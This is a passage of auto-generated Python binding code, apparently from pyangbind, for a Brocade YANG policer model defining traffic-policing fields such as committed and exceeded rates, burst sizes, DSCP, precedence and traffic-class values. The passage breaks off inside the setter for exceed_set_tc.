self.__ebs = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'1250..12500000000']}), is_leaf=True, yang_name="ebs", rest_name="ebs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exceeded Burst Size.', u'cli-optional-in-sequence': None, u'display-when': u'(../eir != 0)'}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
self.__conform_set_prec = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="conform-set-prec", rest_name="conform-set-prec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IP Precedence value for conformant traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../conform-set-dscp = '64') or not(../conform-set-dscp)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='precedence-value', is_config=True)
self.__cir = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'40000..100000000000']}), is_leaf=True, yang_name="cir", rest_name="cir", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Committed Information Rate.', u'cli-suppress-no': None, u'cli-hide-in-submode': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
self.__conform_set_dscp = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 63']}), is_leaf=True, yang_name="conform-set-dscp", rest_name="conform-set-dscp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'DCSP Priority for conformant traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../conform-set-prec = '64') or not(../conform-set-prec)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='dscp-value', is_config=True)
self.__exceed_set_dscp = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 63']}), is_leaf=True, yang_name="exceed-set-dscp", rest_name="exceed-set-dscp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'DCSP Priority for exceeded traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../exceed-set-prec = '64') or not(../exceed-set-prec)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='dscp-value', is_config=True)
self.__set_priority = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="set-priority", rest_name="set-priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Police Priority Map Name', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='string', is_config=True)
self.__conform_set_tc = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="conform-set-tc", rest_name="conform-set-tc", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Traffic Class value for conformant traffic.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='tc-value', is_config=True)
self.__exceed_set_prec = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="exceed-set-prec", rest_name="exceed-set-prec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IP Precedence value for exceeded traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../exceed-set-dscp = '64') or not(../exceed-set-dscp)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='precedence-value', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'policy-map', u'class', u'police']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'policy-map', u'class', u'police']
def _get_cir(self):
"""
Getter method for cir, mapped from YANG variable /policy_map/class/police/cir (uint64)
"""
return self.__cir
def _set_cir(self, v, load=False):
"""
Setter method for cir, mapped from YANG variable /policy_map/class/police/cir (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_cir is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_cir() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'40000..100000000000']}), is_leaf=True, yang_name="cir", rest_name="cir", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Committed Information Rate.', u'cli-suppress-no': None, u'cli-hide-in-submode': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """cir must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'40000..100000000000']}), is_leaf=True, yang_name="cir", rest_name="cir", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Committed Information Rate.', u'cli-suppress-no': None, u'cli-hide-in-submode': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)""",
})
self.__cir = t
if hasattr(self, '_set'):
self._set()
def _unset_cir(self):
self.__cir = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'40000..100000000000']}), is_leaf=True, yang_name="cir", rest_name="cir", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Committed Information Rate.', u'cli-suppress-no': None, u'cli-hide-in-submode': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
def _get_cbs(self):
"""
Getter method for cbs, mapped from YANG variable /policy_map/class/police/cbs (uint64)
"""
return self.__cbs
def _set_cbs(self, v, load=False):
"""
Setter method for cbs, mapped from YANG variable /policy_map/class/police/cbs (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_cbs is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_cbs() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'1250..12500000000']}), is_leaf=True, yang_name="cbs", rest_name="cbs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Comitted Burst Size.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """cbs must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'1250..12500000000']}), is_leaf=True, yang_name="cbs", rest_name="cbs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Comitted Burst Size.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)""",
})
self.__cbs = t
if hasattr(self, '_set'):
self._set()
def _unset_cbs(self):
self.__cbs = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'1250..12500000000']}), is_leaf=True, yang_name="cbs", rest_name="cbs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Comitted Burst Size.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
def _get_eir(self):
"""
Getter method for eir, mapped from YANG variable /policy_map/class/police/eir (uint64)
"""
return self.__eir
def _set_eir(self, v, load=False):
"""
Setter method for eir, mapped from YANG variable /policy_map/class/police/eir (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_eir is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_eir() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'0..100000000000']}), is_leaf=True, yang_name="eir", rest_name="eir", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exceeded Information Rate.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """eir must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'0..100000000000']}), is_leaf=True, yang_name="eir", rest_name="eir", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exceeded Information Rate.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)""",
})
self.__eir = t
if hasattr(self, '_set'):
self._set()
def _unset_eir(self):
self.__eir = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'0..100000000000']}), is_leaf=True, yang_name="eir", rest_name="eir", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exceeded Information Rate.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
def _get_ebs(self):
"""
Getter method for ebs, mapped from YANG variable /policy_map/class/police/ebs (uint64)
"""
return self.__ebs
def _set_ebs(self, v, load=False):
"""
Setter method for ebs, mapped from YANG variable /policy_map/class/police/ebs (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_ebs is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ebs() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'1250..12500000000']}), is_leaf=True, yang_name="ebs", rest_name="ebs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exceeded Burst Size.', u'cli-optional-in-sequence': None, u'display-when': u'(../eir != 0)'}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ebs must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'1250..12500000000']}), is_leaf=True, yang_name="ebs", rest_name="ebs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exceeded Burst Size.', u'cli-optional-in-sequence': None, u'display-when': u'(../eir != 0)'}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)""",
})
self.__ebs = t
if hasattr(self, '_set'):
self._set()
def _unset_ebs(self):
self.__ebs = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'1250..12500000000']}), is_leaf=True, yang_name="ebs", rest_name="ebs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exceeded Burst Size.', u'cli-optional-in-sequence': None, u'display-when': u'(../eir != 0)'}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
def _get_set_priority(self):
"""
Getter method for set_priority, mapped from YANG variable /policy_map/class/police/set_priority (string)
"""
return self.__set_priority
def _set_set_priority(self, v, load=False):
"""
Setter method for set_priority, mapped from YANG variable /policy_map/class/police/set_priority (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_set_priority is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_set_priority() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="set-priority", rest_name="set-priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Police Priority Map Name', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """set_priority must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="set-priority", rest_name="set-priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Police Priority Map Name', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='string', is_config=True)""",
})
self.__set_priority = t
if hasattr(self, '_set'):
self._set()
def _unset_set_priority(self):
self.__set_priority = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="set-priority", rest_name="set-priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Police Priority Map Name', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='string', is_config=True)
def _get_conform_set_dscp(self):
"""
Getter method for conform_set_dscp, mapped from YANG variable /policy_map/class/police/conform_set_dscp (dscp-value)
"""
return self.__conform_set_dscp
def _set_conform_set_dscp(self, v, load=False):
"""
Setter method for conform_set_dscp, mapped from YANG variable /policy_map/class/police/conform_set_dscp (dscp-value)
If this variable is read-only (config: false) in the
source YANG file, then _set_conform_set_dscp is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_conform_set_dscp() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 63']}), is_leaf=True, yang_name="conform-set-dscp", rest_name="conform-set-dscp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'DCSP Priority for conformant traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../conform-set-prec = '64') or not(../conform-set-prec)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='dscp-value', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """conform_set_dscp must be of a type compatible with dscp-value""",
'defined-type': "brocade-policer:dscp-value",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 63']}), is_leaf=True, yang_name="conform-set-dscp", rest_name="conform-set-dscp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'DCSP Priority for conformant traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../conform-set-prec = '64') or not(../conform-set-prec)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='dscp-value', is_config=True)""",
})
self.__conform_set_dscp = t
if hasattr(self, '_set'):
self._set()
def _unset_conform_set_dscp(self):
self.__conform_set_dscp = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 63']}), is_leaf=True, yang_name="conform-set-dscp", rest_name="conform-set-dscp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'DCSP Priority for conformant traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../conform-set-prec = '64') or not(../conform-set-prec)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='dscp-value', is_config=True)
def _get_conform_set_prec(self):
"""
Getter method for conform_set_prec, mapped from YANG variable /policy_map/class/police/conform_set_prec (precedence-value)
"""
return self.__conform_set_prec
def _set_conform_set_prec(self, v, load=False):
"""
Setter method for conform_set_prec, mapped from YANG variable /policy_map/class/police/conform_set_prec (precedence-value)
If this variable is read-only (config: false) in the
source YANG file, then _set_conform_set_prec is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_conform_set_prec() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="conform-set-prec", rest_name="conform-set-prec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IP Precedence value for conformant traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../conform-set-dscp = '64') or not(../conform-set-dscp)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='precedence-value', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """conform_set_prec must be of a type compatible with precedence-value""",
'defined-type': "brocade-policer:precedence-value",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="conform-set-prec", rest_name="conform-set-prec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IP Precedence value for conformant traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../conform-set-dscp = '64') or not(../conform-set-dscp)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='precedence-value', is_config=True)""",
})
self.__conform_set_prec = t
if hasattr(self, '_set'):
self._set()
def _unset_conform_set_prec(self):
self.__conform_set_prec = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="conform-set-prec", rest_name="conform-set-prec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IP Precedence value for conformant traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../conform-set-dscp = '64') or not(../conform-set-dscp)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='precedence-value', is_config=True)
def _get_conform_set_tc(self):
"""
Getter method for conform_set_tc, mapped from YANG variable /policy_map/class/police/conform_set_tc (tc-value)
"""
return self.__conform_set_tc
def _set_conform_set_tc(self, v, load=False):
"""
Setter method for conform_set_tc, mapped from YANG variable /policy_map/class/police/conform_set_tc (tc-value)
If this variable is read-only (config: false) in the
source YANG file, then _set_conform_set_tc is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_conform_set_tc() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="conform-set-tc", rest_name="conform-set-tc", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Traffic Class value for conformant traffic.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='tc-value', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """conform_set_tc must be of a type compatible with tc-value""",
'defined-type': "brocade-policer:tc-value",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="conform-set-tc", rest_name="conform-set-tc", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Traffic Class value for conformant traffic.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='tc-value', is_config=True)""",
})
self.__conform_set_tc = t
if hasattr(self, '_set'):
self._set()
def _unset_conform_set_tc(self):
self.__conform_set_tc = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="conform-set-tc", rest_name="conform-set-tc", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Traffic Class value for conformant traffic.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='tc-value', is_config=True)
def _get_exceed_set_dscp(self):
"""
Getter method for exceed_set_dscp, mapped from YANG variable /policy_map/class/police/exceed_set_dscp (dscp-value)
"""
return self.__exceed_set_dscp
def _set_exceed_set_dscp(self, v, load=False):
"""
Setter method for exceed_set_dscp, mapped from YANG variable /policy_map/class/police/exceed_set_dscp (dscp-value)
If this variable is read-only (config: false) in the
source YANG file, then _set_exceed_set_dscp is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_exceed_set_dscp() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 63']}), is_leaf=True, yang_name="exceed-set-dscp", rest_name="exceed-set-dscp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'DCSP Priority for exceeded traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../exceed-set-prec = '64') or not(../exceed-set-prec)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='dscp-value', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """exceed_set_dscp must be of a type compatible with dscp-value""",
'defined-type': "brocade-policer:dscp-value",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 63']}), is_leaf=True, yang_name="exceed-set-dscp", rest_name="exceed-set-dscp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'DCSP Priority for exceeded traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../exceed-set-prec = '64') or not(../exceed-set-prec)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='dscp-value', is_config=True)""",
})
self.__exceed_set_dscp = t
if hasattr(self, '_set'):
self._set()
def _unset_exceed_set_dscp(self):
self.__exceed_set_dscp = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 63']}), is_leaf=True, yang_name="exceed-set-dscp", rest_name="exceed-set-dscp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'DCSP Priority for exceeded traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../exceed-set-prec = '64') or not(../exceed-set-prec)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='dscp-value', is_config=True)
def _get_exceed_set_prec(self):
"""
Getter method for exceed_set_prec, mapped from YANG variable /policy_map/class/police/exceed_set_prec (precedence-value)
"""
return self.__exceed_set_prec
def _set_exceed_set_prec(self, v, load=False):
"""
Setter method for exceed_set_prec, mapped from YANG variable /policy_map/class/police/exceed_set_prec (precedence-value)
If this variable is read-only (config: false) in the
source YANG file, then _set_exceed_set_prec is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_exceed_set_prec() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="exceed-set-prec", rest_name="exceed-set-prec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IP Precedence value for exceeded traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../exceed-set-dscp = '64') or not(../exceed-set-dscp)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='precedence-value', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """exceed_set_prec must be of a type compatible with precedence-value""",
'defined-type': "brocade-policer:precedence-value",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="exceed-set-prec", rest_name="exceed-set-prec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IP Precedence value for exceeded traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../exceed-set-dscp = '64') or not(../exceed-set-dscp)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='precedence-value', is_config=True)""",
})
self.__exceed_set_prec = t
if hasattr(self, '_set'):
self._set()
def _unset_exceed_set_prec(self):
self.__exceed_set_prec = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="exceed-set-prec", rest_name="exceed-set-prec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IP Precedence value for exceeded traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../exceed-set-dscp = '64') or not(../exceed-set-dscp)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='precedence-value', is_config=True)
def _get_exceed_set_tc(self):
"""
Getter method for exceed_set_tc, mapped from YANG variable /policy_map/class/police/exceed_set_tc (tc-value)
"""
return self.__exceed_set_tc
def _set_exceed_set_tc(self, v, load=False):
"""
Setter method for exceed_set_tc, mapped from YANG variable /policy_map/class/police/exceed_set_tc (tc-value)
If this variable is read-only (config: false) in the
source YANG file, then _set_exceed_set_tc is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_exceed_set_tc() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
